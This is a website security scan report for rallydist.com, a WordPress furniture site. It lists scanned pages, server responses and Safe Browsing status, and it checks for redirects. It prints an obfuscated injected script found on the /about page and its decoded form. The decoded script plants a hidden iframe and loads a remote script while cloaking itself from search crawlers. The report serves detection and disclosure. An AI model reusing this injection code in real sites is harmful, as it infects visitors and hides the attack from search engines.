Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rallydist.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Scanned pages/files
Request | Server response | Status |
http://www.rallydist.com/ | 200 OK Content-Length: 63319 Content-Type: text/html | clean |
http://www.rallydist.com/wp-content/themes/inove/js/base.js | 200 OK Content-Length: 2678 Content-Type: application/javascript | clean |
http://www.rallydist.com/wp-content/themes/inove/js/menu.js | 200 OK Content-Length: 4798 Content-Type: application/javascript | clean |
http://www.rallydist.com/about | 200 OK Content-Length: 29186 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
var _1Ol='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKsFTSoQGbph2Qk5WZwBXYuwWSPpwOdBzWpcCZhVGangSZtFmTnFGV5J0c05WZtVGbFRXZn5CduVWb1N2bkBSPgwWSPBichZnC7kCTSVlL05WZtV3YvRGK05WZu9Gct92QJJVVlR2bj5WZrcSPsJXdmcyKpIXZyJXZmVmcuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9YWZyZyJrcyav1zYyNHdld2Pv02bj5SZ0F2YzVnZi9Wet5SawF2LvoDc0RHanASPgMmcz5CbxkkC7kyJ0BXayN2cngCduVWblxWRlRXYlJ3YuQnbl1Wdj9GZg0DIsFTSgIXY2tTf7kCKrFWZyJ0egkCM94TKnUGb0JXdUdCKm9EelRmbp5CduV2ZBJXZzVnLy9GdhdWa2Fmbuc3bk5Wa3BCf8BCM94TKnQ3biVGbn92bHd
Decoded script:
var _escape='%3Ciframe%20src%3D%22http%3A//virtuoso-luxury.info/go.php%3Fsid%3D1%22%20width%3D20%20height%3D20%20frameborder%3D20%3E%3C/iframe%3E';if(window.navigator.userAgent.indexOf('Rambler')>=0 || window.navigator.userAgent.indexOf('Yandex')>=0 || window.navigator.userAgent.indexOf('Yaho')>=0 || window.navigator.userAgent.indexOf('Googlebot')>=0 || window.navigator.userAgent.indexOf('Turtle')>=0) {Break();};var I1l = document.createElement('script'); I1l.src = 'http: I1l.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var OIl = document.getElementsByTagName('head')[0]; OIl.appendChild(I1l);document.write(unescape(_escape));
Antivirus reports:
http://www.rallydist.com/wp-content/themes/inove/js/comment.js | 200 OK Content-Length: 2256 Content-Type: application/javascript | clean |
http://www.rallydist.com/about/trackback | HTTP/1.1 302 Moved Temporarily Connection: close Date: Tue, 30 Sep 2014 06:24:29 GMT Location: http://www.rallydist.com/about Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.rallydist.com/xmlrpc.php X-Powered-By: PHP/5.3.27 | clean |
http://www.rallydist.com/test404page.js | 404 Not Found Content-Length: 1970 Content-Type: text/html | clean |
http://www.rallydist.com/wp-login.php | 200 OK Content-Length: 2303 Content-Type: text/html | clean |
http://www.rallydist.com/wp-login.php?action=lostpassword | 200 OK Content-Length: 1951 Content-Type: text/html | clean |
http://www.rallydist.com/feed | 200 OK Content-Length: 38513 Content-Type: text/xml | clean |
http://www.rallydist.com/luxury-cat-bed.php | 200 OK Content-Length: 30137 Content-Type: text/html | clean |
http://www.rallydist.com/category/bed | 200 OK Content-Length: 67774 Content-Type: text/html | clean |
http://www.rallydist.com/spring-air-adjustable-bed.php | 200 OK Content-Length: 33522 Content-Type: text/html | clean |
http://www.rallydist.com/author | 404 Not Found Content-Length: 1970 Content-Type: text/html | clean |
http://www.rallydist.com/spring-air-adjustable-bed.php/trackback | HTTP/1.1 302 Moved Temporarily Connection: close Date: Tue, 30 Sep 2014 06:24:37 GMT Location: http://www.rallydist.com/spring-air-adjustable-bed.php Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Link: <http://www.rallydist.com/?p=1393>; rel=shortlink X-Pingback: http://www.rallydist.com/xmlrpc.php X-Powered-By: PHP/5.3.27 | clean |
http://www.rallydist.com/unfinished-dresser.php | 200 OK Content-Length: 29449 Content-Type: text/html | clean |
http://www.rallydist.com/category/dresser | 200 OK Content-Length: 51918 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rallydist.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: rallydist.com
Referer: http://www.google.com/search?q=rallydist.com
Result:
The result is similar to the first query. There are no suspicious redirects found.